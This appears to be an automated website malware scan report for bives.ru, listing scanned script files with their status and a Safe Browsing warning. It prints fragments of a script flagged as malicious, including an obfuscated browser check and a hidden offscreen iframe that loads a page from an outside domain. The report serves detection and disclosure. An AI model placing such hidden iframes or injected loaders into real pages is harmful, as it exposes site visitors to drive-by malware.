Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bives.ru
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.bives.ru/ | 200 OK Content-Length: 32209 Content-Type: text/html | clean |
http://www.bives.ru//ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js/ | 500 Internal Server Error Content-Length: 590 Content-Type: text/html | clean |
http://www.bives.ru/test404page.js | 404 Not Found Content-Length: 277 Content-Type: text/html | clean |
http://www.bives.ru/plugins/system/jqueryintegrator/jqueryintegrator/jquery.noconflict.js | 200 OK Content-Length: 2092 Content-Type: application/javascript | clean |
http://www.bives.ru/media/system/js/core.js | 200 OK Content-Length: 6297 Content-Type: application/javascript | clean |
http://www.bives.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 90612 Content-Type: application/javascript | clean |
http://www.bives.ru/media/system/js/caption.js | 200 OK Content-Length: 2872 Content-Type: application/javascript | clean |
http://www.bives.ru/modules/mod_zstagcloud/js/swfobject.js | 200 OK Content-Length: 11831 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
(function(){
function stripos (f_haystack, f_needle, f_offset) {
    var haystack = (f_haystack + '').toLowerCase();
    var needle = (f_needle + '').toLowerCase();
    var sendinde = 0;
    if ((sendinde = haystack.indexOf(needle, f_offset)) !== -1) {
        return sendinde;
    }
    return false;
}
function get_user_agent(){
    var check_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fr
Decoded script:
function E() {
    if (e) {
        return;
    }
    if (h.ie && h.win) {
        var v = a("span");
        try {
            var u = K.getElementsByTagName("body")[0].appendChild(v);
            u.parentNode.removeChild(u);
        } catch (w) {
            return;
        }
    }
    e = true;
    if (Z) {
        clearInterval(Z);
        Z = null;
    }
    var q = o.length;
    for (var r = 0; r < q; r++) {
        o[r]();
    }
}
<iframe name="Urbanistic" src="http://lacoste.desgraciadas.com.ar/kytsoykgjtjrj19.html" style="position:absolute;left:-1280px;top:-1280px;" height="133" width="133"></iframe>
Antivirus reports:
http://www.bives.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 240200 Content-Type: application/javascript | clean |
http://www.bives.ru/modules/mod_djimageslider/assets/slider.js | 200 OK Content-Length: 13617 Content-Type: application/javascript | clean |
http://www.bives.ru/modules/mod_djmenu/assets/js/dropline-helper.js | 200 OK Content-Length: 2578 Content-Type: application/javascript | clean |
http://www.bives.ru/modules/mod_djmenu/assets/js/djmenu.js | 200 OK Content-Length: 8888 Content-Type: application/javascript | clean |
http://www.bives.ru/templates/dj-travel/lib/js/set_height.js | 200 OK Content-Length: 2703 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bives.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: bives.ru
Referer: http://www.google.com/search?q=bives.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.